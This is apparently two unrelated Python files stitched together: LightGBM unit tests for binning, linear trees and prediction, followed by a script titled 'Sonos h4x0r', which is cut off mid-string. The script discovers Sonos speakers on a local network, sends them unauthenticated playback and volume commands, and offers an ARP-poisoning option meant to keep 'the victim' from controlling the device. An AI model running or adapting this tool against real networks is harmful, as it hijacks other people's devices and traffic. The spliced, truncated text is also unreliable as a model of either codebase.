    y = np.arange(0, 1, 0.01)
    forcedbins_filename = (
        Path(__file__).absolute().parents[2] / 'examples' / 'regression' / 'forced_bins.json'
    )
    params = {'objective': 'regression_l1',
              'max_bin': 5,
              'forcedbins_filename': forcedbins_filename,
              'num_leaves': 2,
              'min_data_in_leaf': 1,
              'verbose': -1}
    lgb_x = lgb.Dataset(x, label=y)
    est = lgb.train(params, lgb_x, num_boost_round=20)
    # With forced bins on feature 0, these three probes must get three
    # distinct predictions.
    new_x = np.zeros((3, x.shape[1]))
    new_x[:, 0] = [0.31, 0.37, 0.41]
    predicted = est.predict(new_x)
    assert len(np.unique(predicted)) == 3
    # Varying only feature 1 (no forced bins on it) collapses the probes
    # into a single prediction.
    new_x[:, 0] = [0, 0, 0]
    new_x[:, 1] = [-0.9, -0.6, -0.3]
    predicted = est.predict(new_x)
    assert len(np.unique(predicted)) == 1
    # Retraining without forced bins changes the binning: the same probes
    # now produce three distinct predictions.
    params['forcedbins_filename'] = ''
    lgb_x = lgb.Dataset(x, label=y)
    est = lgb.train(params, lgb_x, num_boost_round=20)
    predicted = est.predict(new_x)
    assert len(np.unique(predicted)) == 3
    params['forcedbins_filename'] = (
        Path(__file__).absolute().parents[2] / 'examples' / 'regression' / 'forced_bins2.json'
    )
    params['max_bin'] = 11
    lgb_x = lgb.Dataset(x[:, :1], label=y)
    est = lgb.train(params, lgb_x, num_boost_round=50)
    predicted = est.predict(x[1:, :1])
    # Each distinct predicted value should cover 9-11 of the 99 rows.
    _, counts = np.unique(predicted, return_counts=True)
    assert min(counts) >= 9
    assert max(counts) <= 11
def test_binning_same_sign():
    """Binning must work for features whose values are all one sign."""
    feats = np.empty((99, 2))
    feats[:, 0] = np.arange(0.01, 1, 0.01)   # strictly positive feature
    feats[:, 1] = -np.arange(0.01, 1, 0.01)  # strictly negative feature
    target = np.arange(0.01, 1, 0.01)
    train_params = {'objective': 'regression_l1',
                    'max_bin': 5,
                    'num_leaves': 2,
                    'min_data_in_leaf': 1,
                    'verbose': -1,
                    'seed': 0}
    booster = lgb.train(train_params, lgb.Dataset(feats, label=target), num_boost_round=20)
    # Vary only the positive feature: -1 and 0 must share a prediction,
    # while 1 must differ.
    probe = np.zeros((3, 2))
    probe[:, 0] = [-1, 0, 1]
    preds = booster.predict(probe)
    assert preds[0] == pytest.approx(preds[1])
    assert preds[1] != pytest.approx(preds[2])
    # Vary only the negative feature: now 0 and 1 must agree while -1 differs.
    probe = np.zeros((3, 2))
    probe[:, 1] = [-1, 0, 1]
    preds = booster.predict(probe)
    assert preds[0] != pytest.approx(preds[1])
    assert preds[1] == pytest.approx(preds[2])
def test_dataset_update_params():
    """Changing Dataset params after construction is only allowed in safe cases.

    Decreasing `min_data_in_leaf` is fine before lazy init, while raw data
    is kept, or with `feature_pre_filter` disabled; once a Dataset is
    constructed with pre-filtering enabled, any parameter change must raise
    LightGBMError.
    """
    default_params = {"max_bin": 100,
                      "max_bin_by_feature": [20, 10],
                      "bin_construct_sample_cnt": 10000,
                      "min_data_in_bin": 1,
                      "use_missing": False,
                      "zero_as_missing": False,
                      "categorical_feature": [0],
                      "feature_pre_filter": True,
                      "pre_partition": False,
                      "enable_bundle": True,
                      "data_random_seed": 0,
                      "is_enable_sparse": True,
                      "header": True,
                      "two_round": True,
                      "label_column": 0,
                      "weight_column": 0,
                      "group_column": 0,
                      "ignore_column": 0,
                      "min_data_in_leaf": 10,
                      "linear_tree": False,
                      "precise_float_parser": True,
                      "verbose": -1}
    # One changed value per key; each change must be rejected in the loop below.
    unchangeable_params = {"max_bin": 150,
                           "max_bin_by_feature": [30, 5],
                           "bin_construct_sample_cnt": 5000,
                           "min_data_in_bin": 2,
                           "use_missing": True,
                           "zero_as_missing": True,
                           "categorical_feature": [0, 1],
                           "feature_pre_filter": False,
                           "pre_partition": True,
                           "enable_bundle": False,
                           "data_random_seed": 1,
                           "is_enable_sparse": False,
                           "header": False,
                           "two_round": False,
                           "label_column": 1,
                           "weight_column": 1,
                           "group_column": 1,
                           "ignore_column": 1,
                           "forcedbins_filename": "/some/path/forcedbins.json",
                           "min_data_in_leaf": 2,
                           "linear_tree": True,
                           "precise_float_parser": False}
    X = np.random.random((100, 2))
    y = np.random.random(100)
    # decreasing without freeing raw data is allowed
    lgb_data = lgb.Dataset(X, y, params=default_params, free_raw_data=False).construct()
    default_params["min_data_in_leaf"] -= 1
    lgb.train(default_params, lgb_data, num_boost_round=3)
    # decreasing before lazy init is allowed
    lgb_data = lgb.Dataset(X, y, params=default_params)
    default_params["min_data_in_leaf"] -= 1
    lgb.train(default_params, lgb_data, num_boost_round=3)
    # increasing is allowed
    default_params["min_data_in_leaf"] += 2
    lgb.train(default_params, lgb_data, num_boost_round=3)
    # decreasing with disabled filter is allowed
    default_params["feature_pre_filter"] = False
    lgb_data = lgb.Dataset(X, y, params=default_params).construct()
    default_params["min_data_in_leaf"] -= 4
    lgb.train(default_params, lgb_data, num_boost_round=3)
    # decreasing with enabled filter is disallowed;
    # also changes of other params are disallowed
    default_params["feature_pre_filter"] = True
    lgb_data = lgb.Dataset(X, y, params=default_params).construct()
    for key, value in unchangeable_params.items():
        new_params = default_params.copy()
        new_params[key] = value
        if key != "forcedbins_filename":
            param_name = key
        else:
            # The library's error message refers to this one as "forced bins".
            param_name = "forced bins"
        err_msg = ("Reducing `min_data_in_leaf` with `feature_pre_filter=true` may cause *"
                   if key == "min_data_in_leaf"
                   else f"Cannot change {param_name} *")
        with np.testing.assert_raises_regex(lgb.basic.LightGBMError, err_msg):
            lgb.train(new_params, lgb_data, num_boost_round=3)
def test_dataset_params_with_reference():
    """A Dataset built with `reference=` inherits the reference's params."""
    shared_params = {"max_bin": 100}
    X_tr = np.random.random((100, 2))
    y_tr = np.random.random(100)
    X_va = np.random.random((100, 2))
    y_va = np.random.random(100)
    train_ds = lgb.Dataset(X_tr, y_tr, params=shared_params, free_raw_data=False).construct()
    valid_ds = lgb.Dataset(X_va, y_va, reference=train_ds, free_raw_data=False).construct()
    # The params must propagate from the reference to the validation set.
    assert train_ds.get_params() == shared_params
    assert valid_ds.get_params() == shared_params
    lgb.train(shared_params, train_ds, valid_sets=[valid_ds])
def test_extra_trees():
    """Enabling extra_trees acts as regularization (higher train error)."""
    X, y = load_boston(return_X_y=True)
    dataset = lgb.Dataset(X, label=y)
    base_params = {'objective': 'regression',
                   'num_leaves': 32,
                   'verbose': -1,
                   'extra_trees': False,
                   'seed': 0}
    booster = lgb.train(base_params, dataset, num_boost_round=10)
    err_plain = mean_squared_error(y, booster.predict(X))
    # Same setup with extremely randomized (extra) splits enabled.
    base_params['extra_trees'] = True
    booster = lgb.train(base_params, dataset, num_boost_round=10)
    err_extra = mean_squared_error(y, booster.predict(X))
    assert err_plain < err_extra
def test_path_smoothing():
    """Enabling path_smooth acts as regularization (higher train error)."""
    X, y = load_boston(return_X_y=True)
    dataset = lgb.Dataset(X, label=y)
    base_params = {'objective': 'regression',
                   'num_leaves': 32,
                   'verbose': -1,
                   'seed': 0}
    booster = lgb.train(base_params, dataset, num_boost_round=10)
    err_plain = mean_squared_error(y, booster.predict(X))
    # Retrain with path smoothing turned on.
    base_params['path_smooth'] = 1
    booster = lgb.train(base_params, dataset, num_boost_round=10)
    err_smooth = mean_squared_error(y, booster.predict(X))
    assert err_plain < err_smooth
def test_trees_to_dataframe():
    """trees_to_dataframe must agree with feature_importance and handle stumps."""
    pytest.importorskip("pandas")
    def _imptcs_to_numpy(X, impcts_dict):
        # Map a {feature_name: importance} dict onto X's dense column order,
        # filling 0. for features that never split.
        cols = [f'Column_{i}' for i in range(X.shape[1])]
        return [impcts_dict.get(col, 0.) for col in cols]
    X, y = load_breast_cancer(return_X_y=True)
    data = lgb.Dataset(X, label=y)
    num_trees = 10
    bst = lgb.train({"objective": "binary", "verbose": -1}, data, num_trees)
    tree_df = bst.trees_to_dataframe()
    # Split importance: count of non-leaf rows per splitting feature.
    split_dict = (tree_df[~tree_df['split_gain'].isnull()]
                  .groupby('split_feature')
                  .size()
                  .to_dict())
    # Gain importance: summed split_gain per splitting feature.
    gains_dict = (tree_df
                  .groupby('split_feature')['split_gain']
                  .sum()
                  .to_dict())
    tree_split = _imptcs_to_numpy(X, split_dict)
    tree_gains = _imptcs_to_numpy(X, gains_dict)
    mod_split = bst.feature_importance('split')
    mod_gains = bst.feature_importance('gain')
    num_trees_from_df = tree_df['tree_index'].nunique()
    obs_counts_from_df = tree_df.loc[tree_df['node_depth'] == 1, 'count'].values
    np.testing.assert_equal(tree_split, mod_split)
    np.testing.assert_allclose(tree_gains, mod_gains)
    assert num_trees_from_df == num_trees
    # Every root node's observation count equals the full training set size.
    np.testing.assert_equal(obs_counts_from_df, len(y))
    # test edge case with one leaf
    X = np.ones((10, 2))
    y = np.random.rand(10)
    data = lgb.Dataset(X, label=y)
    bst = lgb.train({"objective": "binary", "verbose": -1}, data, num_trees)
    tree_df = bst.trees_to_dataframe()
    # Constant features give a single-leaf tree: one row with all
    # split-related columns set to None.
    assert len(tree_df) == 1
    assert tree_df.loc[0, 'tree_index'] == 0
    assert tree_df.loc[0, 'node_depth'] == 1
    assert tree_df.loc[0, 'node_index'] == "0-L0"
    assert tree_df.loc[0, 'value'] is not None
    for col in ('left_child', 'right_child', 'parent_index', 'split_feature',
                'split_gain', 'threshold', 'decision_type', 'missing_direction',
                'missing_type', 'weight', 'count'):
        assert tree_df.loc[0, col] is None
def test_interaction_constraints():
    """interaction_constraints: one all-feature group is a no-op; tighter
    partitions progressively reduce training accuracy."""
    X, y = load_boston(return_X_y=True)
    num_features = X.shape[1]
    train_data = lgb.Dataset(X, label=y)
    # check that constraint containing all features is equivalent to no constraint
    params = {'verbose': -1,
              'seed': 0}
    est = lgb.train(params, train_data, num_boost_round=10)
    pred1 = est.predict(X)
    est = lgb.train(dict(params, interaction_constraints=[list(range(num_features))]), train_data,
                    num_boost_round=10)
    pred2 = est.predict(X)
    np.testing.assert_allclose(pred1, pred2)
    # check that constraint partitioning the features reduces train accuracy
    est = lgb.train(dict(params, interaction_constraints=[list(range(num_features // 2)),
                                                          list(range(num_features // 2, num_features))]),
                    train_data, num_boost_round=10)
    pred3 = est.predict(X)
    assert mean_squared_error(y, pred1) < mean_squared_error(y, pred3)
    # check that constraints consisting of single features reduce accuracy further
    est = lgb.train(dict(params, interaction_constraints=[[i] for i in range(num_features)]), train_data,
                    num_boost_round=10)
    pred4 = est.predict(X)
    assert mean_squared_error(y, pred3) < mean_squared_error(y, pred4)
    # test that interaction constraints work when not all features are used
    X = np.concatenate([np.zeros((X.shape[0], 1)), X], axis=1)
    num_features = X.shape[1]
    train_data = lgb.Dataset(X, label=y)
    est = lgb.train(dict(params, interaction_constraints=[[0] + list(range(2, num_features)),
                                                          [1] + list(range(2, num_features))]),
                    train_data, num_boost_round=10)
def test_linear_trees(tmp_path):
    """linear_tree=True must fit linear data better than ordinary trees and
    keep working with nans, bagging, categorical features, refit, and
    save/load round-trips."""
    # check that setting linear_tree=True fits better than ordinary trees when data has linear relationship
    np.random.seed(0)
    x = np.arange(0, 100, 0.1)
    y = 2 * x + np.random.normal(0, 0.1, len(x))
    x = x[:, np.newaxis]
    lgb_train = lgb.Dataset(x, label=y)
    params = {'verbose': -1,
              'metric': 'mse',
              'seed': 0,
              'num_leaves': 2}
    est = lgb.train(params, lgb_train, num_boost_round=10)
    pred1 = est.predict(x)
    lgb_train = lgb.Dataset(x, label=y)
    res = {}
    est = lgb.train(dict(params, linear_tree=True), lgb_train, num_boost_round=10, evals_result=res,
                    valid_sets=[lgb_train], valid_names=['train'])
    pred2 = est.predict(x)
    # Recorded training l2 must roughly match the recomputed MSE.
    assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred2), abs=1e-1)
    assert mean_squared_error(y, pred2) < mean_squared_error(y, pred1)
    # test again with nans in data
    x[:10] = np.nan
    lgb_train = lgb.Dataset(x, label=y)
    est = lgb.train(params, lgb_train, num_boost_round=10)
    pred1 = est.predict(x)
    lgb_train = lgb.Dataset(x, label=y)
    res = {}
    est = lgb.train(dict(params, linear_tree=True), lgb_train, num_boost_round=10, evals_result=res,
                    valid_sets=[lgb_train], valid_names=['train'])
    pred2 = est.predict(x)
    assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred2), abs=1e-1)
    assert mean_squared_error(y, pred2) < mean_squared_error(y, pred1)
    # test again with bagging
    res = {}
    est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
                    num_boost_round=10, evals_result=res, valid_sets=[lgb_train], valid_names=['train'])
    pred = est.predict(x)
    assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred), abs=1e-1)
    # test with a feature that has only one non-nan value
    x = np.concatenate([np.ones([x.shape[0], 1]), x], 1)
    x[500:, 1] = np.nan
    y[500:] += 10
    lgb_train = lgb.Dataset(x, label=y)
    res = {}
    est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
                    num_boost_round=10, evals_result=res, valid_sets=[lgb_train], valid_names=['train'])
    pred = est.predict(x)
    assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred), abs=1e-1)
    # test with a categorical feature
    x[:250, 0] = 0
    y[:250] += 10
    lgb_train = lgb.Dataset(x, label=y)
    est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
                    num_boost_round=10, categorical_feature=[0])
    # test refit: same results on same data
    est2 = est.refit(x, label=y)
    p1 = est.predict(x)
    p2 = est2.predict(x)
    assert np.mean(np.abs(p1 - p2)) < 2
    # test refit with save and load
    temp_model = str(tmp_path / "temp_model.txt")
    est.save_model(temp_model)
    est2 = lgb.Booster(model_file=temp_model)
    est2 = est2.refit(x, label=y)
    p1 = est.predict(x)
    p2 = est2.predict(x)
    assert np.mean(np.abs(p1 - p2)) < 2
    # test refit: different results training on different data
    est3 = est.refit(x[:100, :], label=y[:100])
    p3 = est3.predict(x)
    assert np.mean(np.abs(p2 - p1)) > np.abs(np.max(p3 - p1))
    # test when num_leaves - 1 < num_features and when num_leaves - 1 > num_features
    X_train, _, y_train, _ = train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1, random_state=2)
    params = {'linear_tree': True,
              'verbose': -1,
              'metric': 'mse',
              'seed': 0}
    train_data = lgb.Dataset(X_train, label=y_train, params=dict(params, num_leaves=2))
    est = lgb.train(params, train_data, num_boost_round=10, categorical_feature=[0])
    train_data = lgb.Dataset(X_train, label=y_train, params=dict(params, num_leaves=60))
    est = lgb.train(params, train_data, num_boost_round=10, categorical_feature=[0])
def test_save_and_load_linear(tmp_path):
    """Linear-tree models survive Dataset binary round-trip and model save/load."""
    X_train, _, y_train, _ = train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1,
                                              random_state=2)
    # Prepend a binary column (half zeros, half ones) used as a categorical feature.
    X_train = np.concatenate([np.ones((X_train.shape[0], 1)), X_train], 1)
    half = X_train.shape[0] // 2
    X_train[:half, 0] = 0
    y_train[:half] = 1
    params = {'linear_tree': True}
    ds_original = lgb.Dataset(X_train, label=y_train, params=params)
    model_a = lgb.train(params, ds_original, num_boost_round=10, categorical_feature=[0])
    preds_a = model_a.predict(X_train)
    # Round-trip the Dataset through its binary serialization.
    dataset_path = str(tmp_path / 'temp_dataset.bin')
    ds_original.save_binary(dataset_path)
    model_b = lgb.train(params, lgb.Dataset(dataset_path), num_boost_round=10)
    preds_b = model_b.predict(X_train)
    np.testing.assert_allclose(preds_a, preds_b)
    # Round-trip the Booster through a text model file.
    model_path = str(tmp_path / 'model.txt')
    model_b.save_model(model_path)
    preds_c = lgb.Booster(model_file=model_path).predict(X_train)
    np.testing.assert_allclose(preds_b, preds_c)
def test_linear_single_leaf():
    """linear_tree training works even when trees degenerate to a single leaf."""
    X, y = load_breast_cancer(return_X_y=True)
    # A huge min_sum_hessian prevents any split, forcing one leaf per tree.
    booster = lgb.train(
        {"objective": "binary", "linear_tree": True, "min_sum_hessian": 5000},
        lgb.Dataset(X, label=y),
        num_boost_round=5)
    assert log_loss(y, booster.predict(X)) < 0.661
def test_predict_with_start_iteration():
    """Predictions over [start_iteration, start + num_iteration) must compose.

    Chunked raw-score / contribution predictions summed over the chunks
    must equal the full prediction, and non-positive num_iteration values
    must behave like "all remaining iterations". Runs for regression,
    multi-class, and binary objectives, with and without early stopping.
    """
    def inner_test(X, y, params, early_stopping_rounds):
        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
        train_data = lgb.Dataset(X_train, label=y_train)
        valid_data = lgb.Dataset(X_test, label=y_test)
        booster = lgb.train(params, train_data, num_boost_round=50, early_stopping_rounds=early_stopping_rounds,
                            valid_sets=[valid_data])
        # test that the predict once with all iterations equals summed results with start_iteration and num_iteration
        all_pred = booster.predict(X, raw_score=True)
        all_pred_contrib = booster.predict(X, pred_contrib=True)
        steps = [10, 12]
        for step in steps:
            pred = np.zeros_like(all_pred)
            pred_contrib = np.zeros_like(all_pred_contrib)
            for start_iter in range(0, 50, step):
                pred += booster.predict(X, start_iteration=start_iter, num_iteration=step, raw_score=True)
                pred_contrib += booster.predict(X, start_iteration=start_iter, num_iteration=step, pred_contrib=True)
            np.testing.assert_allclose(all_pred, pred)
            np.testing.assert_allclose(all_pred_contrib, pred_contrib)
        # test the case where start_iteration <= 0, and num_iteration is None
        pred1 = booster.predict(X, start_iteration=-1)
        pred2 = booster.predict(X, num_iteration=booster.best_iteration)
        np.testing.assert_allclose(pred1, pred2)
        # test the case where start_iteration > 0, and num_iteration <= 0
        pred4 = booster.predict(X, start_iteration=10, num_iteration=-1)
        pred5 = booster.predict(X, start_iteration=10, num_iteration=90)
        pred6 = booster.predict(X, start_iteration=10, num_iteration=0)
        np.testing.assert_allclose(pred4, pred5)
        np.testing.assert_allclose(pred4, pred6)
        # test the case where start_iteration > 0, and num_iteration <= 0, with pred_leaf=True
        pred4 = booster.predict(X, start_iteration=10, num_iteration=-1, pred_leaf=True)
        pred5 = booster.predict(X, start_iteration=10, num_iteration=40, pred_leaf=True)
        pred6 = booster.predict(X, start_iteration=10, num_iteration=0, pred_leaf=True)
        np.testing.assert_allclose(pred4, pred5)
        np.testing.assert_allclose(pred4, pred6)
        # test the case where start_iteration > 0, and num_iteration <= 0, with pred_contrib=True
        pred4 = booster.predict(X, start_iteration=10, num_iteration=-1, pred_contrib=True)
        pred5 = booster.predict(X, start_iteration=10, num_iteration=40, pred_contrib=True)
        pred6 = booster.predict(X, start_iteration=10, num_iteration=0, pred_contrib=True)
        np.testing.assert_allclose(pred4, pred5)
        np.testing.assert_allclose(pred4, pred6)
    # test for regression
    X, y = load_boston(return_X_y=True)
    params = {
        'objective': 'regression',
        'verbose': -1,
        'metric': 'l2',
        'learning_rate': 0.5
    }
    # test both with and without early stopping
    inner_test(X, y, params, early_stopping_rounds=1)
    inner_test(X, y, params, early_stopping_rounds=5)
    inner_test(X, y, params, early_stopping_rounds=None)
    # test for multi-class
    X, y = load_iris(return_X_y=True)
    params = {
        'objective': 'multiclass',
        'num_class': 3,
        'verbose': -1,
        'metric': 'multi_error'
    }
    # test both with and without early stopping
    inner_test(X, y, params, early_stopping_rounds=1)
    inner_test(X, y, params, early_stopping_rounds=5)
    inner_test(X, y, params, early_stopping_rounds=None)
    # test for binary
    X, y = load_breast_cancer(return_X_y=True)
    params = {
        'objective': 'binary',
        'verbose': -1,
        'metric': 'auc'
    }
    # test both with and without early stopping
    inner_test(X, y, params, early_stopping_rounds=1)
    inner_test(X, y, params, early_stopping_rounds=5)
    inner_test(X, y, params, early_stopping_rounds=None)
def test_average_precision_metric():
    """LightGBM's average_precision metric must agree with scikit-learn's."""
    X, y = load_breast_cancer(return_X_y=True)
    train_params = {
        'objective': 'binary',
        'metric': 'average_precision',
        'verbose': -1
    }
    eval_history = {}
    dataset = lgb.Dataset(X, label=y)
    booster = lgb.train(train_params, dataset, num_boost_round=10,
                        valid_sets=[dataset], evals_result=eval_history)
    lgb_ap = eval_history['training']['average_precision'][-1]
    sklearn_ap = average_precision_score(y, booster.predict(X))
    assert lgb_ap == pytest.approx(sklearn_ap)
    # test that average precision is 1 where model predicts perfectly
    y = y.copy()
    y[:] = 1
    dataset = lgb.Dataset(X, label=y)
    lgb.train(train_params, dataset, num_boost_round=1,
              valid_sets=[dataset], evals_result=eval_history)
    assert eval_history['training']['average_precision'][-1] == pytest.approx(1)
def test_reset_params_works_with_metric_num_class_and_boosting():
    """reset_parameter keeps dataset params and applies changed booster params."""
    X, y = load_breast_cancer(return_X_y=True)
    dataset_params = {"max_bin": 150}
    booster_params = {
        'objective': 'multiclass',
        'max_depth': 4,
        'bagging_fraction': 0.8,
        'metric': ['multi_logloss', 'multi_error'],
        'boosting': 'gbdt',
        'num_class': 5
    }
    dtrain = lgb.Dataset(X, y, params=dataset_params)
    bst = lgb.Booster(params=booster_params, train_set=dtrain)
    assert bst.params == dict(dataset_params, **booster_params)
    # Tweak one parameter and reset: both handles must reflect the merge of
    # dataset params and the updated booster params.
    booster_params['bagging_fraction'] += 0.1
    new_bst = bst.reset_parameter(booster_params)
    combined_params = dict(dataset_params, **booster_params)
    assert bst.params == combined_params
    assert new_bst.params == combined_params
def test_dump_model():
    """dump_model output contains linear-leaf fields only when linear_tree=True."""
    X, y = load_breast_cancer(return_X_y=True)
    params = {
        "objective": "binary",
        "verbose": -1
    }
    linear_only_keys = ("leaf_features", "leaf_coeff", "leaf_const")
    common_keys = ("leaf_value", "leaf_count")
    booster = lgb.train(params, lgb.Dataset(X, label=y), num_boost_round=5)
    dumped = str(booster.dump_model(5, 0))
    # A plain model has leaf values/counts but no linear-leaf coefficients.
    for key in linear_only_keys:
        assert key not in dumped
    for key in common_keys:
        assert key in dumped
    # With linear trees enabled, all leaf fields must be present.
    params['linear_tree'] = True
    booster = lgb.train(params, lgb.Dataset(X, label=y), num_boost_round=5)
    dumped = str(booster.dump_model(5, 0))
    for key in linear_only_keys + common_keys:
        assert key in dumped
# --- (stray '|' file-concatenation artifact removed; the content below is a separate script) ---
import argparse
import logging
import sys
import socket
from typing import ByteString
import select
import time
import re
from urllib import request
import scapy
import getmac
from getmac import get_mac_address
from scapy.all import *
def getArgs():
    """Parse command-line arguments for the Sonos tool.

    Returns:
        argparse.Namespace with a required `command` ('discover' or
        'control'). For 'control', `address` (-ip) is required, `interface`
        (-arp) is optional, and a sub-`action` (next/previous/pause/play/
        volume) is required; the 'volume' action adds an integer `level`.
    """
    # Parse command-line arguments
    argsParser = argparse.ArgumentParser(
        description="Sonos h4x0r.\nEnables you to mess around " +
        "with sonos devices on the local network.")
    argsParser.add_argument(
        "-v",
        "--verbose",
        required=False,
        action="store_true",
        help="show verbose output (useful for debugging purposes)"
    )
    subparser = argsParser.add_subparsers(
        dest="command",
        title="commands",
        help="(use '{command} -h' to list command-specific arguments)")
    subparser.required = True
    # Define parser rules for different commands.
    # 'discover' takes no further arguments, so registering it is enough
    # (the returned parser object was previously bound but never used).
    subparser.add_parser(
        "discover",
        help="discover sonos devices on the local network")
    # For the control parser, we need an extra subparser that parses the action the user
    # wants to perform. Also, list the 'ip' argument as required.
    controlParser = subparser.add_parser(
        "control",
        help="control a sonos device on the network")
    controlParser.add_argument_group("required arguments").add_argument(
        "-ip",
        "--address",
        required=True,
        action="store",
        help="the address of the sonos device")
    controlParser.add_argument(
        "-arp",
        "--interface",
        required=False,
        action="store",
        help="after performing the command, perform arp poisoning on specified INTERFACE, obstructing the victim from controlling the device")
    actionParser = controlParser.add_subparsers(dest="action", title="action")
    actionParser.required = True
    actionParser.add_parser("next", help="play next song")
    actionParser.add_parser("previous", help="play previous song")
    actionParser.add_parser("pause", help="pause music")
    actionParser.add_parser("play", help="play music")
    volumeParser = actionParser.add_parser("volume", help="control the volume")
    volumeParser.add_argument_group("required argument").add_argument("level",
                                                                     action="store",
                                                                     type=int,
                                                                     help="the volume level (0 - 99) to set")
    return argsParser.parse_args()
# Initialize arguments
# NOTE(review): parsing happens at module import time, so importing this
# module requires valid command-line arguments on sys.argv.
arguments = getArgs()
# Define a list in which we're appending the ip addresses of Sonos devices
# We end up wanting to hijack traffic from the sonos device to those clients.
# This is ONLY necessary when the user wants to perform arp poisoning.
clientList = []
# Initialize logging framework
# Set loglevel to DEBUG if verbose option is specified, otherwise INFO
# Just simply log to stdout with a simple formatter (that's sufficient - no fancy timestamps needed)
verbose = arguments.verbose
logLevel = logging.DEBUG if verbose else logging.INFO
logging.basicConfig(level=logLevel,
                    format="%(message)s",
                    handlers=[logging.StreamHandler(sys.stdout)])
# Silence scapy's own logger so only this tool's messages are shown.
logging.getLogger("scapy").setLevel(logging.CRITICAL)
class SonosDevice:
    """A Sonos device found on the local network.

    Holds the device's IP address, the server-version string it
    advertised over SSDP, and the description URL from which extra
    details can be fetched with an HTTP GET.
    """

    # TODO NIEK: nice to have - fetch that description XML and show some of it.
    def __init__(self, ip, serverVersion, descriptionLocation):
        self.ip, self.serverVersion, self.descriptionLocation = (
            ip, serverVersion, descriptionLocation)
def filterAndGetSonosDevices(dataAddrTupleList):
    """Filter Sonos devices out of raw SSDP responses.

    Args:
        dataAddrTupleList: list of (data, addr) tuples as returned by
            socket.recvfrom(): data is the raw bytes payload and addr
            is an (ip, port) pair.

    Returns:
        A list of SonosDevice objects, one per response that mentions
        'Sonos' AND carries both LOCATION and SERVER headers.
    """
    result = []
    sonosRegex = re.compile(r"Sonos", re.MULTILINE)
    locationRegex = re.compile(r"^LOCATION: (.*)\r$", re.MULTILINE)
    serverVersionRegex = re.compile(r"^SERVER: (.*)\r$", re.MULTILINE)
    for data, addr in dataAddrTupleList:
        # Decode the raw payload; replace undecodable bytes so one
        # malformed (non-Sonos) response cannot abort the whole scan.
        text = data.decode("utf-8", errors="replace")
        # addr is an (ip, port) tuple; the port is irrelevant here.
        ip = addr[0]
        locMatch = locationRegex.search(text)
        serverVersionMatch = serverVersionRegex.search(text)
        # BUG FIX: this check previously reused locationRegex, so the
        # compiled sonosRegex was dead code and ANY UPnP responder with
        # LOCATION and SERVER headers was reported as a Sonos device.
        if sonosRegex.search(text) and locMatch and serverVersionMatch:
            result.append(
                SonosDevice(ip, serverVersionMatch.group(1), locMatch.group(1)))
        # Otherwise: not a Sonos device (or unsupported response) - skip it.
    return result
def discovery():
    """Discover Sonos devices on the local network via SSDP.

    Sends a pre-formed M-SEARCH datagram to the SSDP multicast address
    and collects UDP responses for about 3 seconds, then filters them
    down to Sonos devices.

    Returns:
        A list of SonosDevice objects found on the network.
    """
    multicast_addr = "239.255.255.250"
    ssdp_port = 1900
    # Hex-encoded SSDP search request. Decoded, it reads:
    # M-SEARCH * HTTP/1.1
    # HOST: 239.255.255.250:1900
    # MAN: "ssdp:discover"
    # MX: 1
    # ST: urn:schemas-upnp-org:device:ZonePlayer:1
    # USER-AGENT: Linux UPnP/1.0 Sonos/63.2-89270 (WDCR:Microsoft Windows
    # NT 10.0.19042)
    # X-SONOS-DEVICEID: 03c8b12a-8339-46da-bd08-f1a2b32d1475
    # X-SONOS-SESSIONSECONDS: 11
    # X-SONOS-MDPMODEL: 3
    svcDiscTrigger = bytes.fromhex("4d2d534541524348202a20485454502f" +
                                   "312e310d0a484f53543a203233392e32" +
                                   "35352e3235352e3235303a313930300d" +
                                   "0a4d414e3a2022737364703a64697363" +
                                   "6f766572220d0a4d583a20310d0a5354" +
                                   "3a2075726e3a736368656d61732d7570" +
                                   "6e702d6f72673a6465766963653a5a6f" +
                                   "6e65506c617965723a310d0a55534552" +
                                   "2d4147454e543a204c696e7578205550" +
                                   "6e502f312e3020536f6e6f732f36332e" +
                                   "322d38393237302028574443523a4d69" +
                                   "63726f736f66742057696e646f777320" +
                                   "4e542031302e302e3139303432290d0a" +
                                   "582d534f4e4f532d4445564943454944" +
                                   "3a2030336338623132612d383333392d" +
                                   "343664612d626430382d663161326233" +
                                   "3264313437350d0a582d534f4e4f532d" +
                                   "53455353494f4e5345434f4e44533a20" +
                                   "31310d0a582d534f4e4f532d4d44504d" +
                                   "4f44454c3a20330d0a0d0a")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # Bind to a random free port, then wait briefly so we are actually
        # listening before the multicast goes out - otherwise the earliest
        # responses could be missed.
        sock.bind(('', 0))
        time.sleep(0.05)
        logging.debug(f"Socket (UDP) listening on {sock.getsockname()}")
        sock.sendto(svcDiscTrigger, (multicast_addr, ssdp_port))
        # Collect responses until 3 seconds have elapsed since the send.
        startTime = time.time()
        responses = []
        while time.time() < startTime + 3:
            # select() times out after 1s so the 3s deadline is re-checked.
            recvReady, _, _ = select.select([sock], [], [], 1)
            for s in recvReady:
                # We have no clue how big the message will be; read max size.
                data, addr = s.recvfrom(65535)
                responses.append((data, addr))
                # BUG FIX: the inner literal must use different quotes from
                # the f-string itself - nested double quotes inside a
                # double-quoted f-string are a SyntaxError before Python 3.12.
                logging.debug(f"Packet from {str(addr)}:\n {str(data.decode('utf-8'))}\n")
    finally:
        # Always release the socket, even if select/recv raises.
        sock.close()
    logging.debug(f"Found {str(len(responses))} devices responding to SSDP on network.")
    # Not every multicast responder is a Sonos device; filter the responses.
    devices = filterAndGetSonosDevices(responses)
    logging.debug(f"Found {str(len(devices))} Sonos devices on network.")
    return devices
def setVolume(ip, level):
    """Set the playback volume of the Sonos device at *ip* to *level*."""
    endpoint = f"http://{ip}:1400/MediaRenderer/RenderingControl/Control"
    envelope = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:SetVolume xmlns:u="urn:schemas-upnp-org:service:RenderingControl:1">'
